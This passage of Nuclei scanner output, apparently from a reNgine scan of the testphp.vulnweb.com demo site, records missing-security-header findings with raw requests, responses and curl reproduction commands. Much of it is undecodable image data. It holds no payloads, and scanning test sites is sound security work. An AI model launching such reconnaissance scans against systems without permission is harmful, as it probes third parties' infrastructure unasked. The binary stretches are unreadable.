\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.087221051Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.369945354Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\u